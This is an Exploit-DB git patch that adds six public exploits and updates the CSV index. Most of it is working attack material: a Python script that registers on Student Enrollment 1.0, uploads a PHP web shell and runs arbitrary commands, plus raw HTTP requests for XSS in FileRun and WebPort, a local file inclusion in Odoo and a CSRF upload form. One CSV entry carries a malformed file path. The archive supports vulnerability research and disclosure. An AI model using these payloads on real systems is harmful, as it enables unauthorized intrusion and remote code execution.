From 09b5d3c1b686bdbae57e606afede6e29798735e8 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Tue, 23 Jun 2020 05:02:25 +0000
Subject: [PATCH] DB: 2020-06-23

6 changes to exploits/shellcodes

Frigate 2.02 - Denial Of Service (PoC)
FileRun 2019.05.21 -  Reflected Cross-Site Scripting
Student Enrollment 1.0 - Unauthenticated Remote Code Execution
Odoo 12.0 - Local File Inclusion
Online Student Enrollment System 1.0 - Unauthenticated Arbitrary File Upload
WebPort 1.19.1 - Reflected Cross-Site Scripting
WebPort 1.19.1 - 'setup' Reflected Cross-Site Scripting
---
 exploits/multiple/webapps/48607.txt | 62 +++++++++++++++++++++++++++++
 exploits/multiple/webapps/48609.txt | 57 ++++++++++++++++++++++++++
 exploits/multiple/webapps/48611.txt | 30 ++++++++++++++
 exploits/php/webapps/48608.py       | 44 ++++++++++++++++++++
 exploits/php/webapps/48610.txt      | 24 +++++++++++
 exploits/php/webapps/48612.txt      | 30 ++++++++++++++
 files_exploits.csv                  |  7 ++++
 7 files changed, 254 insertions(+)
 create mode 100644 exploits/multiple/webapps/48607.txt
 create mode 100644 exploits/multiple/webapps/48609.txt
 create mode 100644 exploits/multiple/webapps/48611.txt
 create mode 100755 exploits/php/webapps/48608.py
 create mode 100644 exploits/php/webapps/48610.txt
 create mode 100644 exploits/php/webapps/48612.txt
diff --git a/exploits/multiple/webapps/48607.txt b/exploits/multiple/webapps/48607.txt
new file mode 100644
index 000000000..4b60ef2d3
--- /dev/null
+++ b/exploits/multiple/webapps/48607.txt
@@ -0,0 +1,62 @@
+# Exploit Title: FileRun 2019.05.21 -  Reflected Cross-Site Scripting
+# Date: 2019-07-01
+# Exploit Author: Emre ÖVÜNÇ
+# Vendor Homepage: https://www.filerun.com/
+# Software Link: https://filerun.com/download
+# Version: v2019.05.21
+# Tested on: Windows/Linux
+# CVE: CVE-2019-12905
+
+# CVE-2019-12905
+# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12905
+# https://github.com/EmreOvunc/FileRun-Vulnerabilities/issues/3
+
+# PoC
+
+To exploit vulnerability, someone could upload an allowed file named “><img
+src=x onerror=prompt(document.domain)> to impact users who open the page.
+
+POST /filerun/?module=fileman&section=do&page=up HTTP/1.1
+Host: [TARGET]
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0)
+Gecko/20100101 Firefox/67.0
+Accept: */*
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://172.16.191.129/filerun/
+Content-Type: multipart/form-data;
+boundary=---------------------------142096305821079611661465592403
+Content-Length: 6034
+DNT: 1
+Connection: close
+Cookie: FileRunSID=aqlneuv86ccj3pi4h476faopi5
+
+-----------------------------142096305821079611661465592403
+Content-Disposition: form-data; name="flowTotalSize"
+
+5100
+-----------------------------142096305821079611661465592403
+Content-Disposition: form-data; name="flowIsFirstChunk"
+
+1
+-----------------------------142096305821079611661465592403
+Content-Disposition: form-data; name="flowIsLastChunk"
+
+1
+-----------------------------142096305821079611661465592403
+Content-Disposition: form-data; name="flowFilename"
+
+â��><img src=x onerror=prompt(document.domain)>.jpg
+-----------------------------142096305821079611661465592403
+Content-Disposition: form-data; name="path"
+
+/ROOT/HOME
+-----------------------------142096305821079611661465592403
+Content-Disposition: form-data; name="file"; filename="â��><img src=x
+onerror=prompt(document.domain)>.jpg"
+Content-Type: image/jpg
+
+<%@ I said you should learn! %>
+
+
+-----------------------------142096305821079611661465592403--
\ No newline at end of file
diff --git a/exploits/multiple/webapps/48609.txt b/exploits/multiple/webapps/48609.txt
new file mode 100644
index 000000000..5ecdf7e72
--- /dev/null
+++ b/exploits/multiple/webapps/48609.txt
@@ -0,0 +1,57 @@
+# Exploit Title: Odoo 12.0 - Local File Inclusion
+# Date: 2019-06-14
+# Exploit Author: Emre ÖVÜNÇ
+# Vendor Homepage: https://www.odoo.com/
+# Software Link: https://www.odoo.com/tr_TR/page/download
+# Version: v12.0
+# Tested on: Windows/Linux
+# https://github.com/EmreOvunc/Odoo-12.0-LFI-Vulnerabilities
+# https://www.odoo.com/security-report
+
+# PoC-1
+To exploit vulnerability, someone could use
+'http://[HOST]:8069/base_import/static/c:/windows/win.ini'
+request to get some information from the target.
+
+GET /base_import/static/c:/windows/win.ini HTTP/1.1
+Host: [TARGET]
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0)
+Gecko/20100101 Firefox/67.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+# PoC-2
+To exploit vulnerability, someone could use 'http://[HOST]:8069/
+web/static/c:/windows/win.ini' request to get some information from the
+target.
+
+GET /web/static/c:/windows/win.ini HTTP/1.1
+Host: [TARGET]
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0)
+Gecko/20100101 Firefox/67.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+# PoC-3
+To exploit vulnerability, someone could use 'http://[HOST]:8069/
+base/static/c:/windows/win.ini' request to get some information from the
+target.
+
+GET /base/static/c:/windows/win.ini HTTP/1.1
+Host: [TARGET]
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0)
+Gecko/20100101 Firefox/67.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Upgrade-Insecure-Requests: 1
\ No newline at end of file
diff --git a/exploits/multiple/webapps/48611.txt b/exploits/multiple/webapps/48611.txt
new file mode 100644
index 000000000..5f55df603
--- /dev/null
+++ b/exploits/multiple/webapps/48611.txt
@@ -0,0 +1,30 @@
+# Exploit Title: WebPort 1.19.1 - Reflected Cross-Site Scripting
+# Date: 2019-05-30
+# Exploit Author: Emre ÖVÜNÇ
+# Vendor Homepage: https://webport.se/
+# Software Link: https://webport.se/nedladdningar/
+# Version: v1.19.1
+# Tested on: Windows/Linux
+# CVE-2019-12461
+# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12461
+# https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS
+
+# PoC
+
+To exploit vulnerability, someone could use 'http://
+[server]:8090/log?type="</script><script>alert('xss');</script><script>'
+request
+to impact users who open a maliciously crafted link or third-party web page.
+
+GET /log?type=%22%3C/script%3E%3Cscript%3Ealert(%27xss%27);%3C/script%3E%3Cscript%3E
+HTTP/1.1
+Host: [TARGET]
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0)
+Gecko/20100101 Firefox/67.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Cookie: __tiny_sessid=6361847c-952b-45ba-874c-71f1794ffe37
+Upgrade-Insecure-Requests: 1
\ No newline at end of file
diff --git a/exploits/php/webapps/48608.py b/exploits/php/webapps/48608.py
new file mode 100755
index 000000000..a7fdcd625
--- /dev/null
+++ b/exploits/php/webapps/48608.py
@@ -0,0 +1,44 @@
+# Exploit Title: Student Enrollment 1.0 - Unauthenticated Remote Code Execution
+# Date: 2020-06-22
+# Exploit Author: Selim Enes 'Enesdex' Karaduman
+# Vendor Homepage: https://www.sourcecodester.com/php/14281/online-student-enrollment-system-using-phpmysqli.html
+# Version: 1.0
+# Tested on: Windows 10 / WampServer
+# Usage : python3 exploit.py -u TARGET_URL -c CODE_TO_EXECUTE
+
+import requests
+import string 
+import random 
+import sys
+import getopt
+
+options, remainder = getopt.gnu_getopt(sys.argv[1:], 'hu:c:')
+
+for opt, arg in options:
+    if opt in ('-h'): 
+        print('Usage: python3 exploit.py -u TARGET_URL -c CODE_TO_EXECUTE')
+        exit()
+    elif opt in ('-u'):
+        url = arg
+    elif opt in ('-c'):
+        cmd = arg
+
+
+
+res = ''.join(random.choices(string.ascii_uppercase + string.digits, k = 10)) 
+
+session = requests.session()
+
+burp0_url = url+"/admin/register.php"
+burp0_cookies      = {}
+burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://192.168.1.100/student_enrollment/admin/register.php", "Content-Type": "multipart/form-data; boundary=---------------------------5220369311929647034402434351", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
+burp0_data = "-----------------------------5220369311929647034402434351\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\n"+res+"\r\n-----------------------------5220369311929647034402434351\r\nContent-Disposition: form-data; name=\"email\"\r\n\r\n"+res+"@gmail.com\r\n-----------------------------5220369311929647034402434351\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n"+res+"\r\n-----------------------------5220369311929647034402434351\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n12345678\r\n-----------------------------5220369311929647034402434351\r\nContent-Disposition: form-data; name=\"c_password\"\r\n\r\n12345678\r\n-----------------------------5220369311929647034402434351\r\nContent-Disposition: form-data; name=\"photo\"; filename=\"a.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php\n$cmd = shell_exec($_GET['cmd']); echo $cmd;\n?>\n\r\n-----------------------------5220369311929647034402434351\r\nContent-Disposition: form-data; name=\"register\"\r\n\r\n\r\n-----------------------------5220369311929647034402434351--\r\n"
+session.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
+
+rce = requests.get("http://192.168.1.100/student_enrollment/admin/images/"+res+".php?cmd="+cmd)
+
+get_code = rce.text
+
+print("Exploit Author--> Selim Enes 'Enesdex' Karaduman")
+
+print(get_code)
\ No newline at end of file
diff --git a/exploits/php/webapps/48610.txt b/exploits/php/webapps/48610.txt
new file mode 100644
index 000000000..e332fd4d2
--- /dev/null
+++ b/exploits/php/webapps/48610.txt
@@ -0,0 +1,24 @@
+# Exploit Title: Online Student Enrollment System 1.0 - Unauthenticated Arbitrary File Upload
+# Google Dork: N/A
+# Date: 2020-06-20
+# Exploit Author: BKpatron
+# Vendor Homepage: https://www.campcodes.com/projects/php/4745/online-student-enrollment-system-in-php-mysqli/
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/donbermoy/student_enrollment_1.zip
+# Version: v1.0
+# Tested on: Win 10
+# CVE: N/A
+
+# Vulnerability:
+Online Student Enrollment System version 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution
+(RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file.
+
+#CSRF PoC:
+
+<html>
+<body>
+<form action="http://localhost/student_enrollment/admin/index.php?page=user-profile" method="POST" enctype="multipart/form-data">
+      <input type="file" name="userphoto" required="" id="photo"><br>
+      <input class="btn btn-info" type="submit" name="upphoto" value="Upload Photo">
+    </form>
+</body>
+</html>
\ No newline at end of file
diff --git a/exploits/php/webapps/48612.txt b/exploits/php/webapps/48612.txt
new file mode 100644
index 000000000..954a3579f
--- /dev/null
+++ b/exploits/php/webapps/48612.txt
@@ -0,0 +1,30 @@
+# Exploit Title: WebPort 1.19.1 - 'setup' Reflected Cross-Site Scripting
+# Date: 2019-05-30
+# Exploit Author: Emre ÖVÜNÇ
+# Vendor Homepage: https://webport.se/
+# Software Link: https://webport.se/nedladdningar/
+# Version: v1.19.1
+# Tested on: Windows/Linux
+
+# CVE-2019-12460
+# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12460
+# https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS
+
+# PoC
+To exploit vulnerability, someone could use 'http://
+[server]:8090/access/setup?type="</script><script>alert('xss');</script><script>'
+request
+to impact users who open a maliciously crafted link or third-party web page.
+
+GET /access/setup?type=%22%3C/script%3E%3Cscript%3Ealert(%27xss%27);%3C/script%3E%3Cscript%3E
+HTTP/1.1
+Host: [TARGET]
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0)
+Gecko/20100101 Firefox/67.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Cookie: __tiny_sessid=6361847c-952b-45ba-874c-71f1794ffe37
+Upgrade-Insecure-Requests: 1
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 43ce6e9f5..ba82b8ad1 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6750,6 +6750,7 @@ id,file,description,date,author,type,platform,port
 44481,exploits/windows/dos/44481.py,"Sync Breeze Enterprise 10.4.18 - Denial of-Service (PoC)",2018-04-01,"Mr Bruce",dos,windows,
 38079,exploits/windows/dos/38079.py,"Savant Web Server 3.1 - Denial of-Service (PoC)",2012-01-22,DDD004,dos,windows,
 43197,exploits/windows/dos/43197.py,"ALLPlayer 7.5 - Denial of-Service (PoC)",2017-11-27,"Kiefer Bauer",dos,windows,
+48613,"exploits/windows/dos/48613.Frigate 2.","Frigate 2.02 - Denial Of Service (PoC)",2020-06-22,"Paras Bhatia",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -42864,3 +42865,9 @@ id,file,description,date,author,type,platform,port
 48593,exploits/php/webapps/48593.txt,"College-Management-System-Php 1.0 - Authentication Bypass",2020-06-17,"BLAY ABU SAFIAN",webapps,php,
 48595,exploits/multiple/webapps/48595.txt,"OpenCTI 3.3.1 - Directory Traversal",2020-06-17,"Raif Berkay Dincel",webapps,multiple,
 48605,exploits/php/webapps/48605.txt,"Beauty Parlour Management System 1.0 - Authentication Bypass",2020-06-18,"Prof. Kailas PATIL",webapps,php,
+48607,exploits/multiple/webapps/48607.txt,"FileRun 2019.05.21 -  Reflected Cross-Site Scripting",2020-06-22,"Emre ÖVÜNÇ",webapps,multiple,
+48608,exploits/php/webapps/48608.py,"Student Enrollment 1.0 - Unauthenticated Remote Code Execution",2020-06-22,Enesdex,webapps,php,
+48609,exploits/multiple/webapps/48609.txt,"Odoo 12.0 - Local File Inclusion",2020-06-22,"Emre ÖVÜNÇ",webapps,multiple,
+48610,exploits/php/webapps/48610.txt,"Online Student Enrollment System 1.0 - Unauthenticated Arbitrary File Upload",2020-06-22,BKpatron,webapps,php,
+48611,exploits/multiple/webapps/48611.txt,"WebPort 1.19.1 - Reflected Cross-Site Scripting",2020-06-22,"Emre ÖVÜNÇ",webapps,multiple,
+48612,exploits/php/webapps/48612.txt,"WebPort 1.19.1 - 'setup' Reflected Cross-Site Scripting",2020-06-22,"Emre ÖVÜNÇ",webapps,php,
